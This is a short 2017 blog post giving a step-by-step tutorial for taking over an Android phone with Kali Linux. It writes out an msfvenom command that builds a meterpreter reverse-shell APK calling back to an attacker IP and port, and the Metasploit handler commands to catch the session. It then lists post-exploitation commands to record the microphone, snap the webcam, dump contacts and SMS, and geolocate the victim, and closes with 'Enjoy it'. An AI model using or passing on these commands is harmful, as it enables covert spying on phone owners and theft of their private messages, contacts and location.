Sunday, 17 September 2017

 How to Hack an Android phone with Kali          Linux.(with metasploit payload)


Steps are as follows;
 1.Open kali Linux and open terminal for command.
2.After the opening of command set up the payload and a custom window...
Command as follows;
 msvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R >android.apk
3.In the above created android.apk is seen in documents file.And the apk is install in android phone.
4.And the next is metasploit framework.
Cmd is; msfconsole
5.Next is to setup multi handler.command are as follws;
  msf>use multi handler
  msf exploit(handler)>set payload android/meterpreter/reverse_tcp
  msf exploit(handler)>set LHOST 192.168.0.110
  msf exploit(handler)>set LPORT 4444
  msf exploit(handler)>exploit
Now we can payload is begins..... wait for a while.
6.After that the apk is installed in victims phone the when the victims click the apk meterpreter session is activate.
7.some exploit command are Follows;

  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_contacts
  • dump_sms
  • geolocate
Enjoy it..

No comments:

Post a Comment